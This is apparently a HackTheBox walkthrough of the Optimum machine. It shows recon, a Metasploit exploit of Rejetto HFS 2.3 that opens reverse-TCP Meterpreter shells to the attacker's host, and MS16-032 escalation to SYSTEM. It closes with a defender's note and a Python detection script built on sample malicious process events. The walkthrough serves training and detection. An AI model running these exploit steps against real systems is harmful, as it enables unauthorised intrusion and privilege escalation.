
My next HackTheBox machine to play around with is Optimum. It is a Windows system running HTTP File Server and rated easy. As the machine is running a vulnerable version of HFS, we are able to exploit a vulnerability and gain user access to the box. In order to get the root flag, we take advantage of a privilege escalation exploit that exists on the system. Once we have the SYSTEM user, it’s basically game over!
Reconnaissance
Let’s start by scanning the machine for open ports and services.
$ nmap -A -T4 -p- 10.10.10.8
We get the results below, which show HTTP running on port 80. The service banner identifies it as HttpFileServer (HFS), and the server header gives the exact version as 2.3. HFS is a free web server specifically designed for publishing and sharing files.
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Enumeration
Before doing anything, let’s just verify the webpage and see what can be done.

We see that we have a login page. There are also actions that we can perform such as get list, search etc. When we click on the version, we are redirected to the Rejetto website, so now we know that the server running is a Rejetto HFS server. I did a quick search for default credentials for this server type but it came out empty, as HFS does not ship with default credentials.

Let’s quickly search Exploit Database for a vulnerability associated with HFS version 2.3.
$ searchsploit hfs
--------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Apple Mac OSX 10.4.8 - DMG HFS+ DO_HFS_TRUNCATE Denial of Service | osx/dos/29454.txt
Apple Mac OSX 10.6 - HFS FileSystem (Denial of Service) | osx/dos/12375.c
Apple Mac OSX 10.6.x - HFS Subsystem Information Disclosure | osx/local/35488.c
Apple Mac OSX xnu 1228.x - 'hfs-fcntl' Kernel Privilege Escalation | osx/local/8266.txt
FHFS - FTP/HTTP File Server 2.1.2 Remote Command Execution | windows/remote/37985.py
HFS Http File Server 2.3m Build 300 - Buffer Overflow (PoC) | multiple/remote/48569.py
Linux Kernel 2.6.x - SquashFS Double-Free Denial of Service | linux/dos/28895.txt
Rejetto HTTP File Server (HFS) - Remote Command Execution (Metasploit) | windows/remote/34926.rb
Rejetto HTTP File Server (HFS) 1.5/2.x - Multiple Vulnerabilities | windows/remote/31056.py
Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload | multiple/remote/30850.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1) | windows/remote/34668.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2) | windows/remote/39161.py
Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution | windows/webapps/34852.txt
--------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
We are interested in remote code execution exploits that apply to a Windows server running version 2.3. That brings the list down to the following entries.
$ searchsploit hfs | grep -i remote | grep -i 2.3
HFS Http File Server 2.3m Build 300 - Buffer Overflow (PoC) | multiple/remote/48569.py
Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload | multiple/remote/30850.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1) | windows/remote/34668.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2) | windows/remote/39161.py
Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution | windows/webapps/34852.txt
Exploitation using Metasploit
Let’s search for rejetto in Metasploit. We see an exploit is available for Windows.
$ msfconsole
msf6 > search rejetto
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/rejetto_hfs_exec 2014-09-11 excellent Yes Rejetto HttpFileServer Remote Command Execution
Let’s use that exploit, set the necessary options and run it.
msf6 > use exploit/windows/http/rejetto_hfs_exec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/rejetto_hfs_exec) > options
Module options (exploit/windows/http/rejetto_hfs_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 no Seconds to wait before terminating web server
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes The path of the web application
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.176.95 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(windows/http/rejetto_hfs_exec) > set rhosts 10.10.10.8
rhosts => 10.10.10.8
msf6 exploit(windows/http/rejetto_hfs_exec) > set lhost 10.10.14.20
lhost => 10.10.14.20
msf6 exploit(windows/http/rejetto_hfs_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
When we run the exploit, we get a session.
msf6 exploit(windows/http/rejetto_hfs_exec) > run
[*] Started reverse TCP handler on 10.10.14.20:4444
[*] Using URL: http://0.0.0.0:8080/GeHwwnMUo10N
[*] Local IP: http://192.168.176.95:8080/GeHwwnMUo10N
[*] Server started.
[*] Sending a malicious request to /
/usr/share/metasploit-framework/modules/exploits/windows/http/rejetto_hfs_exec.rb:110: warning: URI.escape is obsolete
/usr/share/metasploit-framework/modules/exploits/windows/http/rejetto_hfs_exec.rb:110: warning: URI.escape is obsolete
[*] Payload request received: /GeHwwnMUo10N
[*] Sending stage (175174 bytes) to 10.10.10.8
[*] Meterpreter session 1 opened (10.10.14.20:4444 -> 10.10.10.8:49198) at 2021-06-27 17:18:25 +0100
[!] Tried to delete %TEMP%\SpVzMpjLl.vbs, unknown result
[*] Server stopped.
We can verify the user id with getuid (userid is not a Meterpreter command). We see that we are logged in as user kostas.
meterpreter > sysinfo
Computer : OPTIMUM
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : el_GR
Domain : HTB
Logged On Users : 1
Meterpreter : x86/windows
meterpreter > userid
[-] Unknown command: userid.
meterpreter > getuid
Server username: OPTIMUM\kostas
We need to escalate our privileges in order to get the SYSTEM user. We can first try to escalate using Meterpreter’s getsystem, but that fails.
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
Privilege Escalation
With the existing session sent to the background, we can search for the suggester module to find possible privilege escalation modules.
msf6 exploit(windows/http/rejetto_hfs_exec) > search suggester
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester
There is only one that exists in this case.
msf6 exploit(windows/http/rejetto_hfs_exec) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run
We get the following results.
[*] 10.10.10.8 - Collecting local exploits for x86/windows...
[*] 10.10.10.8 - 37 exploit checks are being tried...
[+] 10.10.10.8 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 10.10.10.8 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[*] Post module execution completed
When we try to use the bypassuac exploit, we see that it fails.
msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/bypassuac_eventvwr
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/bypassuac_eventvwr) > options
Module options (exploit/windows/local/bypassuac_eventvwr):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.176.95 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows x86
msf6 exploit(windows/local/bypassuac_eventvwr) > set session 1
session => 1
msf6 exploit(windows/local/bypassuac_eventvwr) > set lhost 10.10.14.20
lhost => 10.10.14.20
msf6 exploit(windows/local/bypassuac_eventvwr) > set lport 4445
lport => 4445
msf6 exploit(windows/local/bypassuac_eventvwr) > run
[*] Started reverse TCP handler on 10.10.14.20:4445
[-] Exploit aborted due to failure: no-access: Not in admins group, cannot escalate with this module
[*] Exploit completed, but no session was created.
Let’s try the second suggestion, exploit/windows/local/ms16_032_secondary_logon_handle_privesc.
msf6 exploit(windows/local/bypassuac_eventvwr) > use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > options
Module options (exploit/windows/local/ms16_032_secondary_logon_handle_privesc):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.176.95 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows x86
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set lhost 10.10.14.20
lhost => 10.10.14.20
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set lport 4446
lport => 4446
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set session 1
session => 1
When we run the exploit, a second session pops up.
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > run
[*] Started reverse TCP handler on 10.10.14.20:4446
[+] Compressed size: 1016
[!] Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell
[*] Writing payload file, C:\Users\kostas\AppData\Local\Temp\uoMvZCbhetIu.ps1...
[*] Compressing script contents...
[+] Compressed size: 3600
[*] Executing exploit script...
__ __ ___ ___ ___ ___ ___ ___
| V | _|_ | | _|___| |_ |_ |
| |_ |_| |_| . |___| | |_ | _|
|_|_|_|___|_____|___| |___|___|___|
[by b33f -> @FuzzySec]
[?] Operating system core count: 2
[>] Duplicating CreateProcessWithLogonW handle
[?] Done, using thread handle: 2168
[*] Sniffing out privileged impersonation token..
[?] Thread belongs to: svchost
[+] Thread suspended
[>] Wiping current impersonation token
[>] Building SYSTEM impersonation token
[?] Success, open SYSTEM token handle: 2164
[+] Resuming thread..
[*] Sniffing out SYSTEM shell..
[>] Duplicating SYSTEM token
[>] Starting token race
[>] Starting process race
[!] Holy handle leak Batman, we have a SYSTEM shell!!
4snyZmJwCOyeJ8Dr2JMe5wE1xNH1AjiZ
[+] Executed on target machine.
[*] Sending stage (175174 bytes) to 10.10.10.8
[*] Meterpreter session 2 opened (10.10.14.20:4446 -> 10.10.10.8:49200) at 2021-06-27 17:33:02 +0100
[+] Deleted C:\Users\kostas\AppData\Local\Temp\uoMvZCbhetIu.ps1
We see that we now have system user privileges.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : OPTIMUM
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : el_GR
Domain : HTB
Logged On Users : 2
Meterpreter : x86/windows
Let’s now drop to the shell.
meterpreter > shell
Process 2076 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\kostas\Desktop>
User Flag
The user flag is normally located on the desktop of a normal user (C:\Documents and Settings\User\Desktop). Since we are already on the desktop, all we need to do is read the file user.txt.txt using the type command.
C:\Users\kostas\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is D0BC-0196
Directory of C:\Users\kostas\Desktop
04/07/2021 04:23 <DIR> .
04/07/2021 04:23 <DIR> ..
04/07/2021 04:23 <DIR> %TEMP%
18/03/2017 03:11 760.320 hfs.exe
18/03/2017 03:13 32 user.txt.txt
2 File(s) 760.352 bytes
3 Dir(s) 31.893.905.408 bytes free
C:\Users\kostas\Desktop>type user.txt.txt
type user.txt.txt
d0c39XXXXXXXXXXXXXXXXXef5f73
Root Flag
To get the root flag, we need to locate the Administrator’s desktop and then read the root.txt file.
C:\Users\kostas\Desktop>cd ../..
cd ../..
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is D0BC-0196
Directory of C:\Users
18/03/2017 02:57 <DIR> .
18/03/2017 02:57 <DIR> ..
18/03/2017 02:52 <DIR> Administrator
18/03/2017 02:57 <DIR> kostas
04/07/2021 04:17 <DIR> Public
0 File(s) 0 bytes
5 Dir(s) 31.893.905.408 bytes free
C:\Users>cd Administrator/Desktop
cd Administrator/Desktop
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is D0BC-0196
Directory of C:\Users\Administrator\Desktop
18/03/2017 03:14 <DIR> .
18/03/2017 03:14 <DIR> ..
18/03/2017 03:14 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 31.893.905.408 bytes free
C:\Users\Administrator\Desktop>type root.txt
type root.txt
51ed1b3XXXXXXXXXXXXXXX2b3eeed
Defender’s Note
- We were able to gain access to the system using two vulnerabilities: the HFS 2.3 remote command execution and the MS16-032 local privilege escalation. Had they been patched in a timely manner, it would have taken us a little more effort.
- Opt for secure protocols when transferring files instead of an unpatched file-sharing web server.
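Both exploits left host-side artefacts that a defender can alert on: hfs.exe spawning a script host, a .vbs dropped in %TEMP% (the "Tried to delete %TEMP%\SpVzMpjLl.vbs" line), and a 32-bit SysWOW64 PowerShell running a .ps1 from the user's Temp folder. The following is an added detection example, not part of the original write-up; the JSON field names are an assumed Sysmon-like shape and the events are constructed from the values seen above.

```python
import json
import re

# Constructed process-creation events in a Sysmon-like JSON-lines shape.
# Field names are an assumption for this example, not a real Sysmon export;
# the values mirror the artefacts observed in the write-up.
SAMPLE_EVENTS = r"""
{"Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Users\\kostas\\Desktop\\hfs.exe", "CommandLine": "cmd.exe /c cscript.exe //nologo %TEMP%\\SpVzMpjLl.vbs"}
{"Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\Users\\kostas\\AppData\\Local\\Temp\\uoMvZCbhetIu.ps1"}
{"Image": "C:\\Windows\\System32\\notepad.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "notepad.exe readme.txt"}
{"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell.exe -File C:\\Scripts\\backup.ps1"}
"""

# Interpreters a file-sharing web server has no business launching.
SCRIPT_HOSTS = ("cmd.exe", "wscript.exe", "cscript.exe", "powershell.exe")
# A .vbs or .ps1 referenced via %TEMP% or any ...\Temp\ path on the command line.
TEMP_SCRIPT = re.compile(r"(%temp%|\\temp\\)\S*?\.(vbs|ps1)\b", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> list:
    """Return the names of every detection rule the event matches."""
    hits = []
    image = event.get("Image", "")
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    # Rule 1: hfs.exe spawning a script host (HFS RCE dropping its VBS stager).
    if parent == "hfs.exe" and basename(image) in SCRIPT_HOSTS:
        hits.append("hfs_spawns_script_host")
    # Rule 2: a script executed out of a Temp directory.
    if TEMP_SCRIPT.search(cmd):
        hits.append("script_from_temp")
    # Rule 3: 32-bit PowerShell on a 64-bit host (MS16-032 module behaviour).
    if basename(image) == "powershell.exe" and "\\syswow64\\" in image.lower():
        hits.append("wow64_powershell")
    return hits


def scan(jsonl: str) -> list:
    """Run every rule over a JSON-lines feed; return (image, rules) per alert."""
    alerts = []
    for line in jsonl.strip().splitlines():
        event = json.loads(line)
        hits = classify(event)
        if hits:
            alerts.append((basename(event.get("Image", "")), hits))
    return alerts


if __name__ == "__main__":
    for image, rules in scan(SAMPLE_EVENTS):
        print(f"ALERT {image}: {', '.join(rules)}")
```

The benign notepad and System32 PowerShell events produce no alert, so the rules key on the parent/child relationship and script location rather than on PowerShell use alone.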